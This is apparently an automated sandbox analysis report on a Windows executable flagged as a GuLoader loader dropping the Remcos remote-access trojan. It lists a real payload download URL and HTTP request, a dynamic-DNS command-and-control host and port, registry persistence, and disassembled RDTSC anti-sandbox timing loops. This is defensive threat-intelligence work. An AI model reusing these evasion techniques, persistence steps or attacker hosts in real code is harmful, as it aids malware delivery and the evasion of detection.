Windows Analysis Report pRcHGlVekw.exe

Overview

General Information

Sample Name: pRcHGlVekw.exe
Analysis ID: 458794
MD5: d2cb32f7c7f384b4baa8dd13d6b5bbab
SHA1: 355acb5af5caaeb59fd7c9e0a54b501c24d47919
SHA256: 2bd846bdda945dc48a21c9bda1497feb9e67df8cfb024cc8669041490c7c9a90
Tags: 32exe
Detection

GuLoader Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
GuLoader behavior detected
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Creates autostart registry keys with suspicious values (likely registry only malware)
Hides threads from debuggers
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses dynamic DNS services
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection:

Found malware configuration
Source: 00000001.00000002.344627340.0000000002180000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "http://101.99.94.119/WEALTH_fkWglQyCXO188.binkw"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\HOMOTYPY\UNDERDEVELOPED.exe ReversingLabs: Detection: 17%
Multi AV Scanner detection for submitted file
Source: pRcHGlVekw.exe ReversingLabs: Detection: 17%
Yara detected Remcos RAT
Source: Yara match File source: 00000010.00000002.1300727955.00000000008E8000.00000004.00000020.sdmp, type: MEMORY
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\HOMOTYPY\UNDERDEVELOPED.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: pRcHGlVekw.exe Joe Sandbox ML: detected

Compliance:

Uses 32bit PE files
Source: pRcHGlVekw.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://101.99.94.119/WEALTH_fkWglQyCXO188.binkw
Uses dynamic DNS services
Source: unknown DNS query: name: wealthyrem.ddns.net
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.3:49737 -> 194.5.97.128:39200
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 194.5.97.128
Source: Joe Sandbox View IP Address: 101.99.94.119
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: DANILENKODE
Source: Joe Sandbox View ASN Name: SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /WEALTH_fkWglQyCXO188.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 101.99.94.119
Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown DNS traffic detected: queries for: wealthyrem.ddns.net
Source: pRcHGlVekw.exe, 00000010.00000002.1300566726.00000000007C0000.00000004.00000001.sdmp String found in binary or memory: http://101.99.94.119/WEALTH_fkWglQyCXO188.bin
Source: pRcHGlVekw.exe, 00000010.00000002.1300566726.00000000007C0000.00000004.00000001.sdmp String found in binary or memory: http://101.99.94.119/WEALTH_fkWglQyCXO188.binwininet.dllMozilla/5.0

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\pRcHGlVekw.exe

E-Banking Fraud:

Yara detected Remcos RAT
Source: Yara match File source: 00000010.00000002.1300727955.00000000008E8000.00000004.00000020.sdmp, type: MEMORY

System Summary:

Abnormal high CPU Usage
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Process Stats: CPU usage > 98%
Contains functionality to call native functions
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_0218929D NtProtectVirtualMemory, 1_2_0218929D
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_0218435F NtWriteVirtualMemory, 1_2_0218435F
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_021859E6 NtAllocateVirtualMemory, 1_2_021859E6
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_02185A22 NtAllocateVirtualMemory, 1_2_02185A22
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_0218486E NtWriteVirtualMemory, 1_2_0218486E
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_021846AC NtWriteVirtualMemory, 1_2_021846AC
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_02184CFA NtWriteVirtualMemory, 1_2_02184CFA
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_0218914B NtProtectVirtualMemory, 1_2_0218914B
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_02185564 NtWriteVirtualMemory,TerminateProcess, 1_2_02185564
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_02181766 NtWriteVirtualMemory, 1_2_02181766
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_02183DA0 NtWriteVirtualMemory, 1_2_02183DA0
Detected potential crypto function
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_0218561A 1_2_0218561A
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_0218226F 1_2_0218226F
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_02180E63 1_2_02180E63
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_02189695 1_2_02189695
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_021806BF 1_2_021806BF
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_0218435F 1_2_0218435F
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_02188817 1_2_02188817
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_02183A2B 1_2_02183A2B
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_02182021 1_2_02182021
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_02188053 1_2_02188053
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_02180248 1_2_02180248
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_0218486E 1_2_0218486E
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_0218086F 1_2_0218086F
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_02185E60 1_2_02185E60
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_02182A67 1_2_02182A67
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_02185E67 1_2_02185E67
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_02187C9A 1_2_02187C9A
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_021896A8 1_2_021896A8
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_021846AC 1_2_021846AC
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_021886D9 1_2_021886D9
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_02180CDF 1_2_02180CDF
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_02182EC2 1_2_02182EC2
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_02184CFA 1_2_02184CFA
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_021810F0 1_2_021810F0
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_02180CE4 1_2_02180CE4
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_02183B1F 1_2_02183B1F
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_02184111 1_2_02184111
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_02181113 1_2_02181113
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_02181136 1_2_02181136
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_02183123 1_2_02183123
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_02182B4B 1_2_02182B4B
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_02183944 1_2_02183944
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_02182F76 1_2_02182F76
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_02185D6E 1_2_02185D6E
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_02188960 1_2_02188960
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_02185564 1_2_02185564
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_02181766 1_2_02181766
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_02181BBB 1_2_02181BBB
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_02183DA0 1_2_02183DA0
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_021879D6 1_2_021879D6
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_021807F2 1_2_021807F2
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_02180DF4 1_2_02180DF4
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_021803F6 1_2_021803F6
PE file contains strange resources
Source: pRcHGlVekw.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: UNDERDEVELOPED.exe.16.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: pRcHGlVekw.exe, 00000001.00000000.219062533.0000000000417000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameLIEGEMAN.exe vs pRcHGlVekw.exe
Source: pRcHGlVekw.exe, 00000001.00000002.344452128.0000000002090000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameuser32j% vs pRcHGlVekw.exe
Source: pRcHGlVekw.exe, 00000010.00000002.1306296984.000000001DD60000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemswsock.dll.muij% vs pRcHGlVekw.exe
Source: pRcHGlVekw.exe, 00000010.00000000.341877354.0000000000417000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameLIEGEMAN.exe vs pRcHGlVekw.exe
Source: pRcHGlVekw.exe Binary or memory string: OriginalFilenameLIEGEMAN.exe vs pRcHGlVekw.exe
Uses 32bit PE files
Source: pRcHGlVekw.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/3@175/3
Source: C:\Users\user\Desktop\pRcHGlVekw.exe File created: C:\Users\user\AppData\Roaming\remcos
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Mutant created: \Sessions\1\BaseNamedObjects\Remcos-FAZALZ
Source: C:\Users\user\Desktop\pRcHGlVekw.exe File created: C:\Users\user\AppData\Local\Temp\~DF4931134DE445F613.TMP
Source: pRcHGlVekw.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\pRcHGlVekw.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: pRcHGlVekw.exe ReversingLabs: Detection: 17%
Source: C:\Users\user\Desktop\pRcHGlVekw.exe File read: C:\Users\user\Desktop\pRcHGlVekw.exe
Source: unknown Process created: C:\Users\user\Desktop\pRcHGlVekw.exe 'C:\Users\user\Desktop\pRcHGlVekw.exe'
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Process created: C:\Users\user\Desktop\pRcHGlVekw.exe 'C:\Users\user\Desktop\pRcHGlVekw.exe'
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Process created: C:\Users\user\Desktop\pRcHGlVekw.exe 'C:\Users\user\Desktop\pRcHGlVekw.exe'
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Data Obfuscation:

Yara detected GuLoader
Source: Yara match File source: 00000001.00000002.344627340.0000000002180000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_00407108 push ebp; retf 1_2_00407109
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_0218A033 push ds; retf 1_2_0218A036
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_0218A037 push ds; retf 1_2_0218A03A
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_0218A02B push ds; retf 1_2_0218A02E
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_0218A02F push ds; retf 1_2_0218A032
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_0218A027 push ds; retf 1_2_0218A02A
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 16_2_0056A037 push ds; retf 16_2_0056A03A
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 16_2_0056A033 push ds; retf 16_2_0056A036
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 16_2_0056A027 push ds; retf 16_2_0056A02A
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 16_2_0056A02F push ds; retf 16_2_0056A032
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 16_2_0056A02B push ds; retf 16_2_0056A02E
Source: initial sample Static PE information: section name: .text entropy: 7.08042704515

Persistence and Installation Behavior:

Drops PE files
Source: C:\Users\user\Desktop\pRcHGlVekw.exe File created: C:\Users\user\AppData\Local\Temp\HOMOTYPY\UNDERDEVELOPED.exe

Boot Survival:

Creates autostart registry keys with suspicious values (likely registry only malware)
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce DRAWSPAN C:\Users\user\AppData\Local\Temp\HOMOTYPY\UNDERDEVELOPED.vbs
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce DRAWSPAN
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect Any.run
Source: C:\Users\user\Desktop\pRcHGlVekw.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\pRcHGlVekw.exe File opened: C:\Program Files\qga\qga.exe
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: pRcHGlVekw.exe, 00000010.00000002.1300566726.00000000007C0000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=\UNDERDEVELOPED.EXE\HOMOTYPYSET W = CREATEOBJECT("WSCRIPT.SHELL")
Source: pRcHGlVekw.exe, 00000001.00000002.344662425.0000000002190000.00000004.00000001.sdmp, pRcHGlVekw.exe, 00000010.00000002.1300566726.00000000007C0000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: pRcHGlVekw.exe, 00000001.00000002.344662425.0000000002190000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL\UNDERDEVELOPED.EXE\HOMOTYPYSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCEDRAWSPAN
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\pRcHGlVekw.exe RDTSC instruction interceptor: First address: 0000000002187EBB second address: 0000000002187EBB instructions:
0x00000000 rdtsc
0x00000002 mov eax, 01B6460Dh
0x00000007 xor eax, BEFED3B1h
0x0000000c sub eax, 17554910h
0x00000011 add eax, 580CB355h
0x00000016 cpuid
0x00000018 popad
0x00000019 call 00007F4E1C9F6F80h
0x0000001e lfence
0x00000021 mov edx, 1889B9A2h
0x00000026 xor edx, A7C3F6EDh
0x0000002c add edx, 20E9D255h
0x00000032 xor edx, 9FCA21B0h
0x00000038 mov edx, dword ptr [edx]
0x0000003a lfence
0x0000003d test dh, 0000006Eh
0x00000040 test cx, cx
0x00000043 cmp cx, dx
0x00000046 ret
0x00000047 sub edx, esi
0x00000049 ret
0x0000004a test dh, ah
0x0000004c add edi, edx
0x0000004e dec dword ptr [ebp+000000F8h]
0x00000054 cmp dword ptr [ebp+000000F8h], 00000000h
0x0000005b jne 00007F4E1C9F6E7Ah
0x0000005d call 00007F4E1C9F6EDDh
0x00000062 call 00007F4E1C9F6FA1h
0x00000067 lfence
0x0000006a mov edx, 1889B9A2h
0x0000006f xor edx, A7C3F6EDh
0x00000075 add edx, 20E9D255h
0x0000007b xor edx, 9FCA21B0h
0x00000081 mov edx, dword ptr [edx]
0x00000083 lfence
0x00000086 test dh, 0000006Eh
0x00000089 test cx, cx
0x0000008c cmp cx, dx
0x0000008f ret
0x00000090 mov esi, edx
0x00000092 pushad
0x00000093 rdtsc
Source: C:\Users\user\Desktop\pRcHGlVekw.exe RDTSC instruction interceptor: First address: 0000000002187FF6 second address: 0000000002187FF6 instructions:
0x00000000 rdtsc
0x00000002 lfence
0x00000005 shl edx, 20h
0x00000008 or edx, eax
0x0000000a ret
0x0000000b mov esi, edx
0x0000000d pushad
0x0000000e mov eax, DFFADC29h
0x00000013 xor eax, 5D423971h
0x00000018 xor eax, 6D1D2D19h
0x0000001d add eax, 105A37C0h
0x00000022 cpuid
0x00000024 psubd mm7, mm2
0x00000027 bt ecx, 1Fh
0x0000002b jc 00007F4E1C91B0F3h
0x00000031 popad
0x00000032 call 00007F4E1C91ABBEh
0x00000037 lfence
0x0000003a rdtsc
Source: C:\Users\user\Desktop\pRcHGlVekw.exe RDTSC instruction interceptor: First address: 0000000000567EBB second address: 0000000000567EBB instructions:
0x00000000 rdtsc
0x00000002 mov eax, 01B6460Dh
0x00000007 xor eax, BEFED3B1h
0x0000000c sub eax, 17554910h
0x00000011 add eax, 580CB355h
0x00000016 cpuid
0x00000018 popad
0x00000019 call 00007F4E1C9F6F80h
0x0000001e lfence
0x00000021 mov edx, 1889B9A2h
0x00000026 xor edx, A7C3F6EDh
0x0000002c add edx, 20E9D255h
0x00000032 xor edx, 9FCA21B0h
0x00000038 mov edx, dword ptr [edx]
0x0000003a lfence
0x0000003d test dh, 0000006Eh
0x00000040 test cx, cx
0x00000043 cmp cx, dx
0x00000046 ret
0x00000047 sub edx, esi
0x00000049 ret
0x0000004a test dh, ah
0x0000004c add edi, edx
0x0000004e dec dword ptr [ebp+000000F8h]
0x00000054 cmp dword ptr [ebp+000000F8h], 00000000h
0x0000005b jne 00007F4E1C9F6E7Ah
0x0000005d call 00007F4E1C9F6EDDh
0x00000062 call 00007F4E1C9F6FA1h
0x00000067 lfence
0x0000006a mov edx, 1889B9A2h
0x0000006f xor edx, A7C3F6EDh
0x00000075 add edx, 20E9D255h
0x0000007b xor edx, 9FCA21B0h
0x00000081 mov edx, dword ptr [edx]
0x00000083 lfence
0x00000086 test dh, 0000006Eh
0x00000089 test cx, cx
0x0000008c cmp cx, dx
0x0000008f ret
0x00000090 mov esi, edx
0x00000092 pushad
0x00000093 rdtsc
Source: C:\Users\user\Desktop\pRcHGlVekw.exe RDTSC instruction interceptor: First address: 0000000000567FF6 second address: 0000000000567FF6 instructions:
0x00000000 rdtsc
0x00000002 lfence
0x00000005 shl edx, 20h
0x00000008 or edx, eax
0x0000000a ret
0x0000000b mov esi, edx
0x0000000d pushad
0x0000000e mov eax, DFFADC29h
0x00000013 xor eax, 5D423971h
0x00000018 xor eax, 6D1D2D19h
0x0000001d add eax, 105A37C0h
0x00000022 cpuid
0x00000024 psubd mm7, mm2
0x00000027 bt ecx, 1Fh
0x0000002b jc 00007F4E1C91B0F3h
0x00000031 popad
0x00000032 call 00007F4E1C91ABBEh
0x00000037 lfence
0x0000003a rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_02187EB3 rdtsc 1_2_02187EB3
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Window / User API: foregroundWindowGot 547
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\pRcHGlVekw.exe TID: 5624 Thread sleep count: 276 > 30
Source: C:\Users\user\Desktop\pRcHGlVekw.exe TID: 5624 Thread sleep time: -138000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Last function: Thread delayed
Source: pRcHGlVekw.exe, 00000010.00000002.1300566726.00000000007C0000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=\UNDERDEVELOPED.exe\HOMOTYPYSet W = CreateObject("WScript.Shell")
Source: pRcHGlVekw.exe, 00000001.00000002.344662425.0000000002190000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll\UNDERDEVELOPED.exe\HOMOTYPYSoftware\Microsoft\Windows\CurrentVersion\RunOnceDRAWSPAN
Source: pRcHGlVekw.exe, 00000001.00000002.344662425.0000000002190000.00000004.00000001.sdmp, pRcHGlVekw.exe, 00000010.00000002.1300566726.00000000007C0000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\pRcHGlVekw.exe System information queried: ModuleInformation

Anti Debugging:

Hides threads from debuggers
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Thread information set: HideFromDebugger
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_02187EB3 rdtsc 1_2_02187EB3
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_02186663 LdrInitializeThunk, 1_2_02186663
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_02188817 mov eax, dword ptr fs:[00000030h] 1_2_02188817
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_02182EC2 mov eax, dword ptr fs:[00000030h] 1_2_02182EC2
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_02187540 mov eax, dword ptr fs:[00000030h] 1_2_02187540
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_02183944 mov eax, dword ptr fs:[00000030h] 1_2_02183944
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_02187BB8 mov eax, dword ptr fs:[00000030h] 1_2_02187BB8
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Code function: 1_2_021855ED mov eax, dword ptr fs:[00000030h] 1_2_021855ED

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\pRcHGlVekw.exe Process created: C:\Users\user\Desktop\pRcHGlVekw.exe 'C:\Users\user\Desktop\pRcHGlVekw.exe'
Source: pRcHGlVekw.exe, 00000010.00000002.1300934977.0000000000FB0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: pRcHGlVekw.exe, 00000010.00000002.1300934977.0000000000FB0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: pRcHGlVekw.exe, 00000010.00000002.1300934977.0000000000FB0000.00000002.00000001.sdmp Binary or memory string: Progman
Source: logs.dat.16.dr Binary or memory string: [ Program Manager ]
Source: pRcHGlVekw.exe, 00000010.00000002.1300934977.0000000000FB0000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Stealing of Sensitive Information:

GuLoader behavior detected
Source: Initial file Signature Results: GuLoader behavior
Yara detected Remcos RAT
Source: Yara match File source: 00000010.00000002.1300727955.00000000008E8000.00000004.00000020.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Remcos RAT
Source: Yara match File source: 00000010.00000002.1300727955.00000000008E8000.00000004.00000020.sdmp, type: MEMORY